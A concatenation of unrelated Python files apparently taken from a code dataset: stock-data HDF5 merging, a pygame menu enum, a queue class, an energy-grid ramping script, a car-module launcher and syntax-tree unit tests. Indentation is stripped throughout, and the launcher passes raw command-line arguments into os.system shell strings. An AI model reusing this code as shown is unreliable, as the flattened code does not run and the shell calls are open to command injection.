'20150801', '20150901', '20151001', '20151101', '20151201', '20160101', '20160201', '20160301', '20160401', '20160501', '20160601', '20160701', '20160801', '20160901', '20161001', '20161101', '20161201', '20170101', '20170201', '20170301', '20170401', '20170501', '20170601', '20170701', '20170801', '20170901', '20171001', '20171101', '20171201', '20180101', '20180201', '20180301', '20180401', '20180501', '20180601', '20180701', '20180801', '20180901', '20181001', '20181101', '20181201']
# k:20150102 - 20181228
# for i in range(165):
# f = h5py.File("D:\Meiying\data\part1_modified.h5", 'r') # 打开h5文件
# store_path = r"D:\Meiying\data\cleaned\\" + dates[i][:6] + ".h5"
# store = pd.HDFStore(store_path, 'w', complevel=4, complib='blosc')
# for k in f.keys():
# if k < dates[i]: continue
# if k >= dates[i+1]: break #每一个月写一个文件
# # 对于某一天
# # count = 0
# h = pd.read_hdf("D:\Meiying\data\part1_modified.h5", key=str(k))
# df = pd.DataFrame(h)
# df['open'] = np.nan
# df['close'] = np.nan
# df['pre_close'] = np.nan
# df['change'] = np.nan
# df['high'] = np.nan
# df['low'] = np.nan
# df['vol'] = np.nan
# df['amount'] = np.nan
# df['pct_chg'] = np.nan
# df.index = df['ts_code'] # 用股票代码重命名行
# for code in df['ts_code']:
# f2 = h5py.File("D:\Meiying\data\dataset_part5.h5", 'r') # 打开h5文件
# for key in f2.keys():
# if code == key:
# h2 = pd.read_hdf("D:\Meiying\data\dataset_part5.h5", key=str(key))
# df2 = pd.DataFrame(h2)
# # print(df2)
# for date in df2["trade_date"]:
# if date == str(k):
# row = df2[df2['trade_date'].isin([str(k)])]
# # index = code # index是在1中的索引
# # index = row.index.values[0] # index是在5中的索引
# df.at[code, "open"] = float(row["open"])
# df.at[code, "close"] = float(row["close"])
# df.at[code, "pre_close"] = float(row["pre_close"])
# df.at[code, "change"] = float(row["change"])
# df.at[code, "high"] = float(row["high"])
# df.at[code, "low"] = float(row["low"])
# df.at[code, "vol"] = float(row["vol"])
# df.at[code, "amount"] = float(row["amount"])
# df.at[code,"pct_chg"] = float(row["pct_chg"])
# # print(code)
# # print(df)
# df.drop("ts_code", axis=1,inplace=True) # 删除多余的ts_code列
# # 把每天的数据写入一个h5表
# store[k] = df
# print(str(k) + " done")
# store.close()
# print(dates[i][:6] + " done")
f = h5py.File("D:\Meiying\data\part1_modified.h5", 'r') # 打开h5文件
store_path = r"D:\Meiying\data\cleaned\labeled.h5"
store = pd.HDFStore(store_path, 'w', complevel=4, complib='blosc')
for k in f.keys():
if k < '20181201': continue
if k >= '20190101': break #每一个月写一个文件
# 对于某一天
# count = 0
h = pd.read_hdf("D:\Meiying\data\part1_modified.h5", key=str(k))
df = pd.DataFrame(h)
df['open'] = np.nan
df['close'] = np.nan
df['pre_close'] = np.nan
df['change'] = np.nan
df['high'] = np.nan
df['low'] = np.nan
df['vol'] = np.nan
df['amount'] = np.nan
df['pct_chg'] = np.nan
df.index = df['ts_code'] # 用股票代码重命名行
for code in df['ts_code']:
f2 = h5py.File("D:\Meiying\data\dataset_part5.h5", 'r') # 打开h5文件
for key in f2.keys():
if code == key:
h2 = pd.read_hdf("D:\Meiying\data\dataset_part5.h5", key=str(key))
df2 = pd.DataFrame(h2)
# print(df2)
for date in df2["trade_date"]:
if date == str(k):
row = df2[df2['trade_date'].isin([str(k)])]
# index = code # index是在1中的索引
# index = row.index.values[0] # index是在5中的索引
df.at[code, "open"] = float(row["open"])
df.at[code, "close"] = float(row["close"])
df.at[code, "pre_close"] = float(row["pre_close"])
df.at[code, "change"] = float(row["change"])
df.at[code, "high"] = float(row["high"])
df.at[code, "low"] = float(row["low"])
df.at[code, "vol"] = float(row["vol"])
df.at[code, "amount"] = float(row["amount"])
df.at[code, "pct_chg"] = float(row["pct_chg"])
# print(code)
# print(df)
df.drop("ts_code", axis=1, inplace=True) # 删除多余的ts_code列
# 把每天的数据写入一个h5表
store[k] = df
print(str(k) + " done")
store.close()
print("201812 done")
# 删除数据缺失值,把表拼接起来 |
13,163 | b35116cae92c10ec561058dd28a2ba735b3c3b1f | import pygame
import enum
class GunMenu(enum.Enum):
BAZOOKA = pygame.transform.scale(pygame.image.load('Pics/GunMenu/FirstChosen.png'), (160, 50))
GRENADE = pygame.transform.scale(pygame.image.load('Pics/GunMenu/SecondChosen.png'), (160, 50))
HOLYBOMB = pygame.transform.scale(pygame.image.load('Pics/GunMenu/ThirdChosen.png'), (160, 50))
|
13,164 | 1457e0ba5ca548245751e215105c55cfa54cb660 | class Block:
def __init__(self, value, next_block):
self.value = value
self.next = next_block
class Queue:
def __init__(self):
self.first = None
self.last = None
def collect(self):
t = []
q = self.first
while q is not None:
t.append(q.value)
q = q.next
return t
def push(self, x):
block = Block(x, None)
if self.first is None:
self.first = block
else:
self.last.next = block
self.last = block
def pop(self):
if self.first is None:
return None
val = self.first.value
self.first = self.first.next
if self.first is None:
self.last = None
return val
q = Queue()
print(q.collect())
q.push(1)
print(q.collect())
print(q.pop())
print(q.collect())
q.push(1)
q.push(2)
q.push(3)
print(q.collect())
print(q.pop())
print(q.collect())
print(q.pop())
print(q.collect())
q.push(4)
q.push(5)
print(q.collect())
print(q.pop())
print(q.collect())
|
13,165 | 1349b2fa8d24365f3393006abe52c4fa982ca436 | import os.path
import shutil
import pickle
import urllib.request
import zipfile
import datetime
import numpy as np
import pandas as pd
from io import BytesIO
import os
import sys
import subprocess
import re
from urllib.request import urlopen
from energy_constraint import *
print('Begin script ' + str(datetime.datetime.now().time()))
# --------- Settings --------- #
pd.set_option('display.max_columns', 70)
np.set_printoptions(precision=4, threshold=20)
export_all = False
# --------- Functions --------- #
def load_pickle(name):
# function to load an object from a pickle
with open(str(name) + '.pkl', 'rb') as f:
temp = pickle.load(f)
return temp
def save_pickle(contents, name):
# function to save to an object as a pickle
with open(str(name) + '.pkl', 'wb') as output:
pickle.dump(contents, output, pickle.HIGHEST_PROTOCOL)
def get_rps(df, rps_state):
# function to find the year and renewable energy percentage given by a state's RPS
try:
print('RPS for ' + rps_state)
print(df.loc[rps_state])
re_frac = df.loc[rps_state, 'RPS RE%']
rps_yr = df.loc[rps_state, 'Year']
except KeyError:
if rps_state == 'TX':
print('Texas requires 10,000 MW of renewable capacity by 2025, this will be handled elsewhere in the '
'script.\n')
re_frac = float('nan')
rps_yr = float('nan')
else:
print('State does not have an RPS, assume constant mix of renewable energy sources.')
re_frac = float('nan')
rps_yr = float('nan')
return re_frac, rps_yr
state='AZ'
region='Southwest'
# case_list = pd.read_excel('/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/Case_List.xlsx')
# states = case_list.groupby(['State']).count()
# # states.apply(lambda x: x['State'].set_index())
# # # states.reset_index(inplace=True)
# print(states)
# state_data = pd.read_excel('/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/State_Data.xlsx', index_col=0,
# header=[0, 1])
# state_data = state_data.loc[state]
# # state_data.reset_index(inplace=True)
# print(state_data)
#
# rps_frac = state_data.loc['RPS', 'Target']
# print('target rps fraction is: ' + str(rps_frac))
# l_matrix = pd.read_csv('/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/L.csv')
num_hours = 5
ramp_ran = 5
region = 'Southwest'
def idxmax(s, w):
i = 0
while i + w <= len(s):
yield(s.iloc[i:i+w].idxmax())
i += 1
future_net_8760 = load_pickle('/Users/gglazer/PycharmProjects/CEP1/data/future_net_8760_pickle')
all_EU = load_pickle('/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/all_EU')
all_RE = load_pickle('/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/all_RE')
eu_matrix = all_EU[region].reset_index()
eu_matrix.sort_index(inplace=True)
eu_matrix.drop(columns='index', inplace=True)
re_matrix = all_RE[region].reset_index()
solar_list = ['Solar_Tracking', 'Solar_Fixed']
# ## things to make 'self'
# change re_matrix to self.re
# change ramp_ran to self.ramp_ran
# re_hours = re_matrix.copy()
max_ramp = pd.DataFrame()
def calc_ramping(cols):
for col in cols:
re_hours = re_matrix.copy()
re_hours['Rolling Max ' + col] = re_hours[col].rolling(window=ramp_ran).max()
re_hours['First Hour ' + col] = pd.Series(idxmax(re_matrix[col], ramp_ran), re_hours.index[ramp_ran-1:])
re_hours.fillna(0, inplace=True)
re_hours['First Hour ' + col] = re_hours['First Hour ' + col].astype(int)
re_hours['Delta ' + col] = re_hours[col] - re_hours['Rolling Max ' + col]
re_hours['Num Hours ' + col] = re_hours.index - re_hours['First Hour ' + col]
# if export_all:
# re_hours.to_csv()
if col == 'Solar_Fixed':
max_ramp_fixed = re_hours.loc[re_hours['Delta ' + col] == min(re_hours['Delta ' + col])]
if col == 'Solar_Tracking':
max_ramp_tracking = re_hours.loc[re_hours['Delta ' + col] == min(re_hours['Delta ' + col])]
return max_ramp_tracking, max_ramp_fixed
# if (max_ramp_fixed.index.values).astype(int) == 6736:
# print((max_ramp_fixed.index.values).astype(int))
# print('poopy')
[max_tracking, max_fixed] = calc_ramping(solar_list)
# change [max_fixed] to self.max_fixed
def find_flex_value(matrix, source, pv_type='fixed'):
if pv_type == 'fixed':
value = matrix[source][max_fixed.index.values].values - \
matrix[source][max_fixed.index.values - max_fixed['Num Hours Solar_Fixed']].values
if pv_type == 'tracking':
value = matrix[source][max_tracking.index.values].values - \
matrix[source][max_tracking.index.values - max_tracking['Num Hours Solar_Tracking']].values
return value
# A_flex values for PVs
a_fixed = -max_fixed['Delta Solar_Fixed'].values
a_track = -max_tracking['Delta Solar_Tracking'].values
# A_flex values for wind sources
a_wind_fix = find_flex_value(re_matrix, 'Wind', 'fixed')
a_wind_tra = find_flex_value(re_matrix, 'Wind', 'tracking')
a_windoff_fix = find_flex_value(re_matrix, 'Wind_Offshore', 'fixed')
a_windoff_tra = find_flex_value(re_matrix, 'Wind_Offshore', 'tracking')
# A_flex values for energy storage
a_es4f = 2
a_es4t = 2
a_es6f = 2
a_es6t = 2
# A_flex values for energy efficiency
a_ee_fix = eu_matrix.iloc[max_fixed.index.values, :].values - \
eu_matrix.iloc[max_fixed.index.values - max_fixed['Num Hours Solar_Fixed'], :].values
a_ee_tra = eu_matrix.iloc[max_tracking.index.values, :].values - \
eu_matrix.iloc[max_tracking.index.values - max_tracking['Num Hours Solar_Tracking'], :].values
# A_flex values for demand response
a_dr_fix = eu_matrix.iloc[max_fixed.index.values, :].values
a_dr_tra = eu_matrix.iloc[max_tracking.index.values, :].values
# subtr = eu_matrix.iloc[max_fixed.index.values - max_fixed['Num Hours Solar_Fixed'], :].values
A_flex = [[a_fixed, 0, a_wind_fix, a_windoff_fix, a_es4f, a_es6f, a_ee_fix, a_dr_fix],
[0, a_track, a_wind_tra, a_windoff_tra, a_es4t, a_es6t, a_ee_tra, a_dr_tra]]
A_flex = np.asarray(A_flex)
print(A_flex)
# print(A_flex)
# np.savetxt('/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/a_flex.csv', A_flex, delimiter=',')
# solar_fixed = re_matrix['Solar_Fixed'].tolist()
# print(solar_fixed[:15])
# print(len(solar_fixed))
# first_delta = solar_fixed[1:] - solar_fixed[0:len(solar_fixed)-1]
# max_delta = []
# max_index = []
# for i in range(ramp_ran, len(solar_fixed)):
# max_delta[i] = solar_fixed[i] - max(solar_fixed[(i-ramp_ran):i])
# max_index[i] = max(solar_fixed[(i-ramp_ran):i]).index
# print(max_delta[:15])
# print(max_delta.shape)
# print(max_index[:15])
# print(max_index.shape)
# print(re_matrix.head())
# print(eu_matrix.head())
# print(re_matrix.head())
# print(future_net_8760)
# # Find top hour of added load
# maxes = future_net_8760.sort_values('Delta', ascending=False)
# max_hour = maxes.iloc[[0]]
# del maxes
# # Sort by net load, keep top hours, add in max hour of added load
# fut_sorted = future_net_8760.sort_values(['Net Load'], ascending=False)
# fut_sorted = fut_sorted[:num_hours]
# fut_sorted = pd.concat([max_hour, fut_sorted])
# fut_sorted.reset_index(inplace=True)
# # Count how many times each day appears in top hours
# fut_sorted['MonthDay'] = fut_sorted[['Month', 'Day']].apply(''.join, axis=1)
# counts = fut_sorted[['MonthDay']]
# counts = counts.groupby(by=['MonthDay'])['MonthDay'].agg('count')
# counts = counts.to_frame()
# counts.rename(columns={'MonthDay': 'Counts'}, inplace=True)
# counts.reset_index(inplace=True)
# fut_sorted = pd.merge(fut_sorted, counts, how='left', on=['MonthDay'])
# # Merge RE, EU matrices into the top hours for net load constraint
# fut_sorted.set_index('index', inplace=True)
# fut_sorted = fut_sorted.merge(re_matrix, how='left', left_index=True, right_index=True)
# fut_sorted = fut_sorted.merge(eu_matrix, how='left', left_index=True, right_index=True)
# print(fut_sorted)
# fut_sorted.to_csv('/Users/gglazer/PycharmProjects/CEP1/data/fut_sorted.csv')
# print(counts)
#
# # Indexing for months
# Jan = 0
# Feb = Jan + 31*24
# Mar = Feb + 28*24
# Apr = Mar + 31*24
# May = Apr + 30*24
# Jun = May + 31*24
# Jul = Jun + 30*24
# Aug = Jul + 31*24
# Sep = Aug + 31*24
# Oct = Sep + 30*24
# Nov = Oct + 31*24
# Dec = Nov + 30*24
# #
# months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
# # months = list(range(1, 13))
# re_8760s = pd.ExcelFile('/Users/gglazer/PycharmProjects/CEP1/data/RE.xlsx', usecols='A:E').parse('Midwest')
# L_matrix = pd.DataFrame(data=0, index=re_8760s.index, columns=months)
# L_matrix['Datetime'] = L_matrix.index
# for month in months:
# # print(L_matrix[month])
# L_matrix[month].loc[L_matrix['Time'].dt.month == month] = 1
# if L_matrix['Datetime'].month == 1:
# L_matrix['Jan'] = 1
#
# L = np.zeros((8760, 12))
# months = [Jan, Feb, Mar, Apr, May, Jun, Jul, Aug, Sep, Oct, Nov, Dec]
# for i in range(len(months)):
# if i == 11:
# L[months[i]:, i] = np.ones((1, len(L)-months[i])).astype(int)
# else:
# L[months[i]:months[i+1], i] = np.ones((1, months[i+1]-months[i])).astype(int)
# # print(L.T.dot(L))
# # np.savetxt('/Users/gglazer/PycharmProjects/RMI/L.csv', L, delimiter=',')
# save_pickle(L, '/Users/gglazer/PycharmProjects/RMI/RMI_gridproj/data/L')
# print(L)
#
# re_8760s = pd.ExcelFile('/Users/gglazer/PycharmProjects/CEP1/data/RE.xlsx', usecols='A:E')
# save_pickle(re_8760s, '/Users/gglazer/PycharmProjects/CEP1/data/pickles/re_8760s_pickle')
# print(df_norm_renewable_cap)
# LHSConstraints('West')
|
13,166 | 48c7cbb922d8fa63dd759b27d7f4a09e7eb12cc1 | #!/usr/bin/env python
#######################################################################################
########### Used to spawn different car modules #######################################
#######################################################################################
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
import subprocess
os.system("../bin/CarCluster "+ sys.argv[1] + " " + sys.argv[2] + " " + sys.argv[3] + " &")
os.system("../bin/CarSpeed "+ sys.argv[1] + " " + sys.argv[2] + " " + sys.argv[3] + " &")
os.system("../bin/CarGPS "+ sys.argv[1] + " " + sys.argv[2] + " " + sys.argv[3] + " &")
os.system("../bin/DCA "+ sys.argv[1] + " " + sys.argv[2] + " " + sys.argv[3] + " &")
os.system("../bin/TaskD "+ sys.argv[1] + " " + sys.argv[2] + " " + sys.argv[3] + " &")
#subprocess.call("./TaskD "+ sys.argv[1] + " " + sys.argv[2] + " " + sys.argv[3] + " &", shell=True)
|
13,167 | 4d81f9fd95cb285139f7a2febae1ab8f6cf26d42 | import rejig.pybytecode
from rejig.syntaxtree import *
def check(what_is, what_should_be):
global failed, total
env = {}
if "\n" in what_is or " = " in what_is or "def " in what_is or "print(" in what_is:
exec("def f():\n " + "\n ".join(what_is.split("\n")), env)
else:
exec("def f():\n return " + what_is, env)
ast = rejig.pybytecode.ast(env["f"])
print(str(ast))
assert ast == what_should_be, "\nshould be: " + repr(what_should_be) + "\nyet it is: " + repr(ast)
check('"hello"', Suite((Call('return', Const('hello')),)))
check('''.3''', Suite((Call('return', Const(.3)),)))
check('''-3''', Suite((Call('return', Const(-3)),)))
check('''--3''', Suite((Call('return', Const(--3)),)))
check('''+3''', Suite((Call('return', Const(+3)),)))
check('''++3''', Suite((Call('return', Const(++3)),)))
check('''+-3''', Suite((Call('return', Const(+-3)),)))
check('''3e1''', Suite((Call('return', Const(3e1)),)))
check('''-3e1''', Suite((Call('return', Const(-3e1)),)))
check('''+3e1''', Suite((Call('return', Const(+3e1)),)))
check('0x123', Suite((Call('return', Const(0x123)),)))
check('0o123', Suite((Call('return', Const(0o123)),)))
check('3+4j', Suite((Call('return', Const(3+4j)),)))
check('''[]''', Suite((Call('return', Call('list')),)))
check('''[3]''', Suite((Call('return', Call('list', Const(3))),)))
check('''[3,]''', Suite((Call('return', Call('list', Const(3))),)))
check('''[3, 4]''', Suite((Call('return', Call('list', Const(3), Const(4))),)))
check('''[3, 4,]''', Suite((Call('return', Call('list', Const(3), Const(4))),)))
check('''[3, 4, 5]''', Suite((Call('return', Call('list', Const(3), Const(4), Const(5))),)))
check('''[3, 4, 5,]''', Suite((Call('return', Call('list', Const(3), Const(4), Const(5))),)))
check('''[3, 4, 5, 6]''', Suite((Call('return', Call('list', Const(3), Const(4), Const(5), Const(6))),)))
check('''[3, 4, 5, 6,]''', Suite((Call('return', Call('list', Const(3), Const(4), Const(5), Const(6))),)))
check('''[[1], 2, 3, 4, 5]''', Suite((Call('return', Call('list', Call('list', Const(1)), Const(2), Const(3), Const(4), Const(5))),)))
check('''[[1, 2], 3, 4, 5]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2)), Const(3), Const(4), Const(5))),)))
check('''[[1, 2, 3], 4, 5]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2), Const(3)), Const(4), Const(5))),)))
check('''[[1, 2, 3, 4], 5]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2), Const(3), Const(4)), Const(5))),)))
check('''[[1, 2, 3, 4, 5]]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2), Const(3), Const(4), Const(5)))),)))
check('''[[[1], 2, 3, 4, 5]]''', Suite((Call('return', Call('list', Call('list', Call('list', Const(1)), Const(2), Const(3), Const(4), Const(5)))),)))
check('''[[[1, 2], 3, 4, 5]]''', Suite((Call('return', Call('list', Call('list', Call('list', Const(1), Const(2)), Const(3), Const(4), Const(5)))),)))
check('''[[[1, 2, 3], 4, 5]]''', Suite((Call('return', Call('list', Call('list', Call('list', Const(1), Const(2), Const(3)), Const(4), Const(5)))),)))
check('''[[[1, 2, 3, 4], 5]]''', Suite((Call('return', Call('list', Call('list', Call('list', Const(1), Const(2), Const(3), Const(4)), Const(5)))),)))
check('''[[[1, 2, 3, 4, 5]]]''', Suite((Call('return', Call('list', Call('list', Call('list', Const(1), Const(2), Const(3), Const(4), Const(5))))),)))
check('''[1, 2, 3, 4, [5]]''', Suite((Call('return', Call('list', Const(1), Const(2), Const(3), Const(4), Call('list', Const(5)))),)))
check('''[1, 2, 3, [4, 5]]''', Suite((Call('return', Call('list', Const(1), Const(2), Const(3), Call('list', Const(4), Const(5)))),)))
check('''[1, 2, [3, 4, 5]]''', Suite((Call('return', Call('list', Const(1), Const(2), Call('list', Const(3), Const(4), Const(5)))),)))
check('''[1, [2, 3, 4, 5]]''', Suite((Call('return', Call('list', Const(1), Call('list', Const(2), Const(3), Const(4), Const(5)))),)))
check('''[[1, 2, 3, 4, [5]]]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2), Const(3), Const(4), Call('list', Const(5))))),)))
check('''[[1, 2, 3, [4, 5]]]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2), Const(3), Call('list', Const(4), Const(5))))),)))
check('''[[1, 2, [3, 4, 5]]]''', Suite((Call('return', Call('list', Call('list', Const(1), Const(2), Call('list', Const(3), Const(4), Const(5))))),)))
check('''[[1, [2, 3, 4, 5]]]''', Suite((Call('return', Call('list', Call('list', Const(1), Call('list', Const(2), Const(3), Const(4), Const(5))))),)))
check('''x = (None)''', Suite((Assign((Name('x'),), Const(None)), Call('return', Const(None)),)))
check('''x = (3, None)''', Suite((Assign((Name('x'),), Call('tuple', Const(3), Const(None))), Call('return', Const(None)),)))
check('''x = (3, 4, None)''', Suite((Assign((Name('x'),), Call('tuple', Const(3), Const(4), Const(None))), Call('return', Const(None)),)))
check('''x = (3, 4, 5, None)''', Suite((Assign((Name('x'),), Call('tuple', Const(3), Const(4), Const(5), Const(None))), Call('return', Const(None)),)))
check('''x = (3, 4, 5, 6, None)''', Suite((Assign((Name('x'),), Call('tuple', Const(3), Const(4), Const(5), Const(6), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, None), 2, 3, 4, 5, None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(None)), Const(2), Const(3), Const(4), Const(5), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, None), 3, 4, 5, None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Const(None)), Const(3), Const(4), Const(5), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, 3, None), 4, 5, None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(None)), Const(4), Const(5), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, 3, 4, None), 5, None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(4), Const(None)), Const(5), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, 3, 4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (((1, None), 2, 3, 4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Call('tuple', Const(1), Const(None)), Const(2), Const(3), Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (((1, 2, None), 3, 4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Call('tuple', Const(1), Const(2), Const(None)), Const(3), Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (((1, 2, 3, None), 4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(None)), Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (((1, 2, 3, 4, None), 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(4), Const(None)), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (((1, 2, 3, 4, 5, None), None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(4), Const(5), Const(None)), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (1, 2, 3, 4, (5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Const(1), Const(2), Const(3), Const(4), Call('tuple', Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (1, 2, 3, (4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Const(1), Const(2), Const(3), Call('tuple', Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (1, 2, (3, 4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Const(1), Const(2), Call('tuple', Const(3), Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = (1, (2, 3, 4, 5, None), None)''', Suite((Assign((Name('x'),), Call('tuple', Const(1), Call('tuple', Const(2), Const(3), Const(4), Const(5), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, 3, 4, (5, None), None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Const(4), Call('tuple', Const(5), Const(None)), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, 3, (4, 5, None), None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Const(3), Call('tuple', Const(4), Const(5), Const(None)), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, 2, (3, 4, 5, None), None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Const(2), Call('tuple', Const(3), Const(4), Const(5), Const(None)), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''x = ((1, (2, 3, 4, 5, None), None), None)''', Suite((Assign((Name('x'),), Call('tuple', Call('tuple', Const(1), Call('tuple', Const(2), Const(3), Const(4), Const(5), Const(None)), Const(None)), Const(None))), Call('return', Const(None)),)))
check('''3
''', Suite((Call('return', Const(None)),))) # hey look: Python does dead code removal!
check('''3
''', Suite((Call('return', Const(None)),)))
check('''3
''', Suite((Call('return', Const(None)),)))
check('''3
''', Suite((Call('return', Const(None)),)))
check('''
3''', Suite((Call('return', Const(None)),)))
check('''
3''', Suite((Call('return', Const(None)),)))
check('''
3''', Suite((Call('return', Const(None)),)))
check('''
3''', Suite((Call('return', Const(None)),)))
check('''a''', Suite((Call('return', Name('a')),)))
check('''a.b''', Suite((Call('return', Call('.', Name('a'), 'b')),)))
check('''a.b.c''', Suite((Call('return', Call('.', Call('.', Name('a'), 'b'), 'c')),)))
check('''a.b.c.d''', Suite((Call('return', Call('.', Call('.', Call('.', Name('a'), 'b'), 'c'), 'd')),)))
check('''a.b.c.d.e''', Suite((Call('return', Call('.', Call('.', Call('.', Call('.', Name('a'), 'b'), 'c'), 'd'), 'e')),)))
check('''a[1]''', Suite((Call('return', Call('[.]', Name('a'), Const(1))),)))
check('''a[1][2]''', Suite((Call('return', Call('[.]', Call('[.]', Name('a'), Const(1)), Const(2))),)))
check('''a[1][2][3]''', Suite((Call('return', Call('[.]', Call('[.]', Call('[.]', Name('a'), Const(1)), Const(2)), Const(3))),)))
check('''a[1][2][3][4]''', Suite((Call('return', Call('[.]', Call('[.]', Call('[.]', Call('[.]', Name('a'), Const(1)), Const(2)), Const(3)), Const(4))),)))
check('''(9, None).stuff''', Suite((Call('return', Call('.', Call('tuple', Const(9), Const(None)), 'stuff')),)))
check('''((9, None), None).stuff''', Suite((Call('return', Call('.', Call('tuple', Call('tuple', Const(9), Const(None)), Const(None)), 'stuff')),)))
check('''(((9, None), None), None).stuff''', Suite((Call('return', Call('.', Call('tuple', Call('tuple', Call('tuple', Const(9), Const(None)), Const(None)), Const(None)), 'stuff')),)))
check('''a[1]''', Suite((Call('return', Call('[.]', Name('a'), Const(1))),)))
check('''a["hey"]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'))),)))
check('''a[1:2]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)))),)))
check('''a[:]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)))),)))
check('''a[1:]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)))),)))
check('''a[:1]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)))),)))
check('''a[::]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)))),)))
check('''a[1::]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)))),)))
check('''a[:1:]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)))),)))
check('''a[::1]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(1)))),)))
check('''a[1:2:]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)))),)))
check('''a[:1:2]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(2)))),)))
check('''a[1::2]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(2)))),)))
check('''a[1:2:3]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(3)))),)))
check('''a[1,]''', Suite((Call('return', Call('[.]', Name('a'), Const(1))),)))
check('''a["hey",]''', Suite((Call('return', Call('[.]', Name('a'), Const('hey'))),)))
check('''a[1:2,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)))),)))
check('''a[:,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)))),)))
check('''a[1:,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)))),)))
check('''a[:1,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)))),)))
check('''a[::,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(None)))),)))
check('''a[1::,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(None)))),)))
check('''a[:1:,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(None)))),)))
check('''a[::1,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(None), Const(1)))),)))
check('''a[1:2:,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(None)))),)))
check('''a[:1:2,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(None), Const(1), Const(2)))),)))
check('''a[1::2,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(None), Const(2)))),)))
check('''a[1:2:3,]''', Suite((Call('return', Call('[.]', Name('a'), Call('slice', Const(1), Const(2), Const(3)))),)))
check('''a[1,5]''', Suite((Call('return', Call('[.]', Name('a'), Const(1), Const(5))),)))
